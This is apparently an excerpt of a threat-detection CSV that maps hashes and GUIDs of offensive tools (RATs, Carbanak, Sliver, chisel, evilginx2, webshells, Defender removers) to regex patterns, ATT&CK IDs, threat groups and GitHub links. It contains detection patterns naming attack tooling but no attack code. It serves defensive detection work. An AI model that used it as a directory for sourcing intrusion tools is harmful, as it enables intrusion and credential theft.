"*d4570fddbd3aaf219c1b905e6e5405e2d0222fb20ca5bf539c593b4ee4b0a66e*",".{0,1000}d4570fddbd3aaf219c1b905e6e5405e2d0222fb20ca5bf539c593b4ee4b0a66e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - 
TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39666" "*d4579c7cf34a278d9c70fdafa36ca0ed47c8c7a93c876901862fe3ecfdede336*",".{0,1000}d4579c7cf34a278d9c70fdafa36ca0ed47c8c7a93c876901862fe3ecfdede336.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39667" "*d459f80368ae7be9d0cbd41ecd25571a25b1b3cff3e0280ee9928321d948f689*",".{0,1000}d459f80368ae7be9d0cbd41ecd25571a25b1b3cff3e0280ee9928321d948f689.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39670" "*d46ed22a1d5e5224bf6a5709526d8ba4cd8fdfc6332199d80d0d8aa9d0d725e2*",".{0,1000}d46ed22a1d5e5224bf6a5709526d8ba4cd8fdfc6332199d80d0d8aa9d0d725e2.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39671" "*d470da028679ca8038b062f9f629d89a994c79d1afc4862104611bb36326d0c8*",".{0,1000}d470da028679ca8038b062f9f629d89a994c79d1afc4862104611bb36326d0c8.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","39672" "*D47C706B-152F-46B5-840A-4EBB2CFAFE33*",".{0,1000}D47C706B\-152F\-46B5\-840A\-4EBB2CFAFE33.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","39673" "*d47de6d27a14f81c4764dea52fdd5f049971d3d0b91cff3d30621728f7c01a92*",".{0,1000}d47de6d27a14f81c4764dea52fdd5f049971d3d0b91cff3d30621728f7c01a92.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39674" 
"*d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209*",".{0,1000}d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39676" "*d494a4bc-3867-436a-93ef-737f9e0522eb*",".{0,1000}d494a4bc\-3867\-436a\-93ef\-737f9e0522eb.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","39677" "*d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556*",".{0,1000}d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","39678" 
"*d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c*",".{0,1000}d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","39679" "*d4aa407ad94b69ed29090fe836f7c9c9d758cef377fe4d9df209135f98165341*",".{0,1000}d4aa407ad94b69ed29090fe836f7c9c9d758cef377fe4d9df209135f98165341.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39682" "*d4aae162571f8338f2560eb32b774647fd0f1952d901dd38f8685e42ceeea813*",".{0,1000}d4aae162571f8338f2560eb32b774647fd0f1952d901dd38f8685e42ceeea813.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","39684" 
"*d4ba2464d2d3450db40ac57c7e0d6d7a7e4ac72c44cbd6ce9e4b3366f3a8907b*",".{0,1000}d4ba2464d2d3450db40ac57c7e0d6d7a7e4ac72c44cbd6ce9e4b3366f3a8907b.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#filehash","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","39689" "*d4ba62aaa1120d8a12463700e71ac099083c7c4c4a38ac77af15c2d5c3737673*",".{0,1000}d4ba62aaa1120d8a12463700e71ac099083c7c4c4a38ac77af15c2d5c3737673.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39690" "*d4bb1f16adc4ec3db363c0fd9c54268843af2654287173e23c9daf6ebf5f671d*",".{0,1000}d4bb1f16adc4ec3db363c0fd9c54268843af2654287173e23c9daf6ebf5f671d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39691" "*d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932*",".{0,1000}d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","39692" 
"*d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0*",".{0,1000}d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39694" "*D4C4772E4D0E458214204795B306E71E67AB3554547CE06DDDC180219E5F4C3D*",".{0,1000}D4C4772E4D0E458214204795B306E71E67AB3554547CE06DDDC180219E5F4C3D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39695" "*d4cfe09288719470c75a0e7b7054dd567d3255d1a331926ef8d5c91ea692a3d0*",".{0,1000}d4cfe09288719470c75a0e7b7054dd567d3255d1a331926ef8d5c91ea692a3d0.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","39696" "*d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a*",".{0,1000}d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39697" "*d4d2f64500f4ef36f7ee8bd2f7b580e143f811d67e8d9b60b680f4fca04a15a8*",".{0,1000}d4d2f64500f4ef36f7ee8bd2f7b580e143f811d67e8d9b60b680f4fca04a15a8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39698" "*d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391*",".{0,1000}d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39699" 
"*d4deb85a5856036a50fc97fd185a545ec437604a64c0c0f7dfe9b7c81265558c*",".{0,1000}d4deb85a5856036a50fc97fd185a545ec437604a64c0c0f7dfe9b7c81265558c.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","39700" "*d4dedef47f4a8c940f6455c170ac17778e558a888167e64ebc15ae44b27b90da*",".{0,1000}d4dedef47f4a8c940f6455c170ac17778e558a888167e64ebc15ae44b27b90da.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39701" "*d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638*",".{0,1000}d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39702" "*d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45*",".{0,1000}d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39703" "*d4e5da3ad9dcf854a1d6d71805fcaf8d418cbb3c7916d85ae641d88a745c23e8*",".{0,1000}d4e5da3ad9dcf854a1d6d71805fcaf8d418cbb3c7916d85ae641d88a745c23e8.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39704" "*d4f8316d0dd8355a0b857cae8f6fd0a6b3edb3603dc154d30b3aefcc8530baad*",".{0,1000}d4f8316d0dd8355a0b857cae8f6fd0a6b3edb3603dc154d30b3aefcc8530baad.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","39705" "*D4stiny/ForkPlayground*",".{0,1000}D4stiny\/ForkPlayground.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","39706" "*d506b46fbd63aebc7150015eefac40aad4d278e9b8b8e84f45e63356267bf7ab*",".{0,1000}d506b46fbd63aebc7150015eefac40aad4d278e9b8b8e84f45e63356267bf7ab.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39707" "*d5092358-f3ab-4712-9c7f-d9ec4390193c*",".{0,1000}d5092358\-f3ab\-4712\-9c7f\-d9ec4390193c.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","#GUIDproject","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","39708" "*d5166ef63bf4d35ede9f2b3649e92406f045bbbf317104f47f9a134f70ecd536*",".{0,1000}d5166ef63bf4d35ede9f2b3649e92406f045bbbf317104f47f9a134f70ecd536.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","39710" "*d51cc14376f771812ed23ed381377da238dea6f9f768d767c8608bc03c1ff0a4*",".{0,1000}d51cc14376f771812ed23ed381377da238dea6f9f768d767c8608bc03c1ff0a4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39712" "*D52008450F6AD0DBB4C8E5596B97A322DAC76CC6A59C9D0CB1AF26D09CC2E013*",".{0,1000}D52008450F6AD0DBB4C8E5596B97A322DAC76CC6A59C9D0CB1AF26D09CC2E013.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","39713" "*D52AB3F8-15D3-49C5-9EAC-468CDF65FB22*",".{0,1000}D52AB3F8\-15D3\-49C5\-9EAC\-468CDF65FB22.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39716" "*d52d17134711fdf76b9ce6da73e8be0616ae49ff3c07516accb3ef2693572240*",".{0,1000}d52d17134711fdf76b9ce6da73e8be0616ae49ff3c07516accb3ef2693572240.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39717" "*d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23*",".{0,1000}d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39719" "*d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7*",".{0,1000}d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","#filehash","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","39720" "*d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77*",".{0,1000}d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39721" "*d547b2cb061f4bb9110e3fb3417ce310ca8abc47f71c9dfb5fa6c1c17373b9ef*",".{0,1000}d547b2cb061f4bb9110e3fb3417ce310ca8abc47f71c9dfb5fa6c1c17373b9ef.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39722" "*d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a*",".{0,1000}d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","39723" "*d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a*",".{0,1000}d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39724" "*d54c329f98f7efcd433ab2813d2be5a6b1454dc7faaa006c239551f08cf2527c*",".{0,1000}d54c329f98f7efcd433ab2813d2be5a6b1454dc7faaa006c239551f08cf2527c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39725" "*d556dc4b57faf4f138956434499e48b52cc97aa6921dcec3d84d04c0e0601d38*",".{0,1000}d556dc4b57faf4f138956434499e48b52cc97aa6921dcec3d84d04c0e0601d38.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39727" "*d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985*",".{0,1000}d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing 
